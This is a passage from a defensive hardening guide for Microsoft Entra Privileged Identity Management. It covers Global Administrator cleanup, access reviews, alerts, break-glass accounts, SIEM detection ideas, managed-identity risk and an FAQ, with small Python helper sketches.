This lists every standing-active Global Administrator in the tenant. Compare against your break-glass roster and your active PIM activations. Anything else is technical debt.
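The comparison itself is a set difference. A minimal sketch, assuming the three inputs are plain lists of user principal names exported from the query above, from your break-glass roster, and from current PIM activations (the function name is illustrative):

```python
def unexplained_standing_admins(active_assignments, break_glass, pim_activations):
    """Return the active Global Administrators that neither list explains."""
    # UPNs are compared case-insensitively.
    expected = {upn.lower() for upn in break_glass} | {upn.lower() for upn in pim_activations}
    return sorted({upn.lower() for upn in active_assignments} - expected)
```

For example, with active assignments for `bg1@contoso.com`, `alice@contoso.com`, and `bob@contoso.com`, a break-glass roster containing `bg1@contoso.com`, and a current activation for `alice@contoso.com`, the function returns only `bob@contoso.com`.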

Step 2: Configure access reviews

Quarterly for Tier-0 and control-plane roles. Semi-annually for Tier-1 and management-plane. Annually for Tier-2 and data/workload-plane [@ms-learn-pim-access-reviews]. Turn on the ML-based review recommendations: the 30-day inactive-user Deny recommendation is the reviewer-assist baseline, and the user-to-group-affiliation Deny recommendation helps reviewers spot principals who are organizationally distant from the rest of the group's membership [@ms-learn-review-recommendations].
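The cadence and the inactive-user rule reduce to two date comparisons. The sketch below is a planning aid, not the product's logic: the day counts approximate quarterly, semi-annual, and annual cycles, and treating "30-day inactive" as 30 or more days since last sign-in is an assumption.

```python
from datetime import date, timedelta

# Approximate review intervals per plane (assumed day counts for the cadences above).
REVIEW_INTERVAL_DAYS = {"control": 90, "management": 180, "data": 365}


def review_is_due(plane, last_review, today):
    """True when the plane's interval has elapsed since the last completed review."""
    return today - last_review >= timedelta(days=REVIEW_INTERVAL_DAYS[plane])


def recommend_deny(last_sign_in, today, inactive_days=30):
    """Mirror the inactive-user recommendation: Deny when there is no recent sign-in."""
    if last_sign_in is None:
        return True  # never signed in
    return (today - last_sign_in).days >= inactive_days
```

Both functions take `today` as a parameter rather than reading the clock, which keeps the schedule testable.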

Step 3: Turn on every PIM Alert and tune the GA-count threshold

Enable all six behavioural PIM Alerts. Tune the "There are too many Global Administrators" alert to a minimum count of two and a percentage of 50% [@ms-learn-pim-alerts]. The expected steady-state count is "fewer than five standing GAs, most of which are break-glass." The High-severity assignment-bypass alert is non-negotiable; route it to a 24x7 SOC queue with an incident-response runbook.

Note: Microsoft Secure Score's "Limit the number of Global Administrators" recommendation targets fewer than five standing GAs as the canonical baseline.

Step 4: Break-glass discipline

Two emergency-access permanent-active Global Administrator accounts. Not one, not three.

Note: One break-glass account is a single point of failure: if it is locked, lost, or compromised, the tenant has no emergency entry path. Three or more begin to expand the blast radius unnecessarily. Two balances the two failure modes. FIDO2 hardware keys, stored in physical safes, with continuous sign-in alerting.

Note: Conditional Access policies can lock you out. Break-glass accounts must be excluded from every CA policy that could prevent their sign-in. Compensate with continuous sign-in alerting on every break-glass authentication event; alerts are the substitute for the gate you are deliberately removing.

Step 5: Extend PIM to the four boundaries

PIM-for-Groups: gate ownership of every directory-role-assignable group, every privileged-access security group, and every group that grants management-group-level Azure RBAC. Membership alone is insufficient; ownership is a backdoor to membership.

PIM-for-Azure-Resources: gate Owner, User Access Administrator, and Contributor at the management-group scope, then explicitly at every subscription, every resource group, and every resource where the role is assignable. Inheritance does not flow; configure per scope.

GDAP and Lighthouse: every CSP partner authorization must be eligible, not active. Set the customer-side PIM policy explicitly. Audit annually.

PIM with Conditional Access: attach an authentication-context tag to activation policies on the privileged Entra roles. Add a CA policy that requires a compliant device and a fresh MFA challenge on activation. The activation gate becomes structurally tighter than the sign-in gate, which is the correct ordering for high-privilege actions.

Step 6: Continuous detection

Pipe PIM activation events (via Microsoft Graph audit logs, surfaced in the AuditLogs and MicrosoftGraphActivityLogs Azure Monitor tables) to your SIEM. Cross-correlate with Entra ID Protection sign-in risk and Microsoft Sentinel UEBA anomaly signals [@ms-learn-sentinel-ueba]. KQL templates to write: (a) GA activations outside business hours; (b) activations from non-compliant devices; (c) the assignment-bypass alert correlated with the activating principal's recent sign-in risk score; (d) managed-identity token issuance against subscription-scoped Owner.
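Template (a) is the simplest of the four, and its logic is worth pinning down before translating it into KQL. The sketch below runs over already-parsed events; the `principal`, `role`, and `activated_at` keys are a hypothetical shape, not the AuditLogs schema, and the 09:00 to 17:00 weekday window is an assumed definition of business hours in the tenant's local time.

```python
from datetime import datetime


def outside_business_hours(timestamp, start_hour=9, end_hour=17):
    """True on weekends, or on weekdays outside [start_hour, end_hour)."""
    is_weekend = timestamp.weekday() >= 5  # Monday is 0, so 5 and 6 are the weekend
    return is_weekend or not (start_hour <= timestamp.hour < end_hour)


def flag_off_hours_ga_activations(events):
    """Keep only Global Administrator activations outside business hours."""
    return [
        event for event in events
        if event["role"] == "Global Administrator"
        and outside_business_hours(event["activated_at"])
    ]
```

An off-hours activation is not an incident by itself. It becomes interesting when correlated with the sign-in risk and UEBA signals named above.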

Step 7: Mind the application-identity surface

This is the longest-running open item. Inventory every managed identity in the tenant. For each, document the role assignment, the scope, and the resource that holds it.

Apply the "Owner and User Access Administrator at subscription scope is dangerous" rule first; tighten those to Contributor or a custom role wherever possible. Where a managed identity must hold a high-privilege role at a high scope, treat the underlying resource (Function App, Logic App, VM, AKS cluster) as a Tier-0 asset for the purposes of patching, network exposure, and code-review process. Until PIM gates application identities natively, the Tier-0-asset framing is the substitute control.
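Once the inventory exists, the first-pass rule is mechanical. A minimal sketch, assuming each inventory row is a dictionary with `identity`, `role`, and `scope` keys (a hypothetical export shape); the scope patterns follow the standard Azure resource ID forms for subscriptions and management groups.

```python
import re

HIGH_PRIVILEGE_ROLES = {"Owner", "User Access Administrator"}

# Scope is exactly a subscription, with no resource group or resource suffix.
SUBSCRIPTION_SCOPE = re.compile(r"^/subscriptions/[^/]+/?$", re.IGNORECASE)
# Scope is a management group, which sits above subscriptions.
MANAGEMENT_GROUP_SCOPE = re.compile(
    r"^/providers/Microsoft\.Management/managementGroups/[^/]+/?$", re.IGNORECASE
)


def is_high_scope(scope):
    """True for subscription-level and management-group-level scopes."""
    return bool(SUBSCRIPTION_SCOPE.match(scope) or MANAGEMENT_GROUP_SCOPE.match(scope))


def tier0_candidates(assignments):
    """Managed-identity assignments whose host resource should be treated as Tier-0."""
    return [
        row for row in assignments
        if row["role"] in HIGH_PRIVILEGE_ROLES and is_high_scope(row["scope"])
    ]
```

Each row returned is either a role assignment to tighten or a host resource to move into the Tier-0 patching and code-review process.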

That is the playbook for the user-principal side of the JIT-admin problem. The application-identity side is still being written. The next iteration of this material will be about the data-model extension that closes Robbins's gap, or the architectural successor that arrives in its place.

12. Frequently Asked Questions and Closing

Three classes of question come up every time this material is taught. The first is conceptual ("what does eligible actually mean?"). The second is operational ("do I need MFA?"). The third is adversarial ("what about managed identities?"). Each appears below.

If my assignment becomes eligible, do I lose my admin rights?

No. Eligible assignments are permanent in most tenants -- they are the standing relationship between principal and role -- but they grant no privilege until you activate. Only the *active* state is bounded. Your admin rights still exist; they are simply not exercised continuously [@ms-learn-pim-configure].

Do I need MFA to activate a role?

Only if the role's activation policy is configured to require it. PIM's activation gates -- MFA at activation, approval, justification, ticket number, and activation maximum duration -- are per-role, per-scope flags the tenant sets independently. A role with `requires_mfa=false` and `requires_approval=false` is a valid (if loose) PIM configuration [@ms-learn-pim-change-default-settings].

How long should an activation last?

One hour for the highest-privileged Entra directory roles, including Global Administrator and Privileged Role Administrator. The configurable range is one to twenty-four hours per role per scope [@ms-learn-pim-change-default-settings]. Tighten where you can; the activation cost is small, the standing-active surface saving is large.

If Conditional Access already protects sign-in, is PIM redundant?

No. Conditional Access gates the sign-in event. PIM bounds the assignment state. A compromised CA-gated GA still has GA privileges once they sign in -- the gate that mattered (activation) was never traversed. CA and PIM compose; PIM is not a substitute for CA, and CA is not a substitute for PIM.

Does PIM block role assignments made outside PIM?

No. PIM raises the High-severity "Roles are being assigned outside of Privileged Identity Management" alert when a direct assignment happens [@ms-learn-pim-alerts]. The control is intentionally detective rather than preventive: blocking direct assignment would break the Microsoft Graph integration surface every legitimate administrative tool uses. Preventive controls -- Conditional Access on the Graph endpoint, Azure Policy at the management-group scope, or entitlement-management workflows -- are added separately based on the tenant's tooling estate.

Does PIM cover managed identities and service principals?

No. PIM's eligible/active state machine is defined over user and group principals. Service principals, managed identities, and OAuth consent grants route around PIM activation entirely. Andy Robbins's June 2022 *Managed Identity Attack Paths* series [@robbins-mip-part1], [@robbins-mip-part2], [@robbins-mip-part3] is the canonical demonstration; MITRE ATT&CK T1078.004 [@mitre-t1078-004] cites Robbins as primary reference. Workload ID Premium plus Conditional Access for workload identities extends sign-in-time controls to service principals (with managed identities still excluded), but does not yet introduce an eligible category for workload-identity role assignments [@ms-learn-ca-workload-identity], [@ms-learn-workload-identity-risk].

Is the Tier-0/1/2 model still current?

Microsoft has shifted the framing to the Enterprise Access Model: control plane, management plane, and data/workload plane [@ms-learn-eam]. The retirement of Tier-0/1/2 is partial; the practitioner community still uses the legacy terms day to day. The underlying principle -- privilege boundaries you do not cross with a single credential -- is preserved across both framings.

Closing

Read the section 1 vignette again. The 2026 tenant where alice@contoso.com is Global Administrator for exactly one hour, with an audit log so complete the SOC 2 auditor signs it without questions, is not a configuration choice. It is the visible behaviour of an identity system whose role-assignment object carries one more field than the 2015 version did. Standing admin did not retire because operators got more disciplined. Standing admin retired because the data model grew a second state.

The forty years between Saltzer and Schroeder's 1975 paper and the 2015 Azure AD PIM Preview were not lost time. UNIX sudo, Kerberos delegation, DACLs, AD groups, MIM PAM, Pass-the-Hash v1 and v2, the Securing Privileged Access roadmap -- each built up the structural understanding that least privilege required a temporal mechanism, not just a static one, and that the temporal mechanism had to live on the assignment object itself, not on the group, the credential, the session, or any indirection through a separate forest. The single new field on the role-assignment object is what those forty years were preparing.

What remains undone is the application-identity boundary. The same role-assignment object Microsoft retrofitted to gate user activation does not yet gate the managed identity attached to a Function App. The IMDS endpoint at 169.254.169.254 is the canonical 2026 bypass path that proves it. Closing that gap, when it comes, will not be a patch to the existing eligible/active state machine. It will be the next chapter -- the one where the state machine learns to apply to a principal that cannot perform an interactive MFA challenge, and the activation semantics are reinvented for the non-interactive case.

The story is not finished. But the first chapter -- the chapter where standing admin became visibly the anti-pattern it had always been -- is.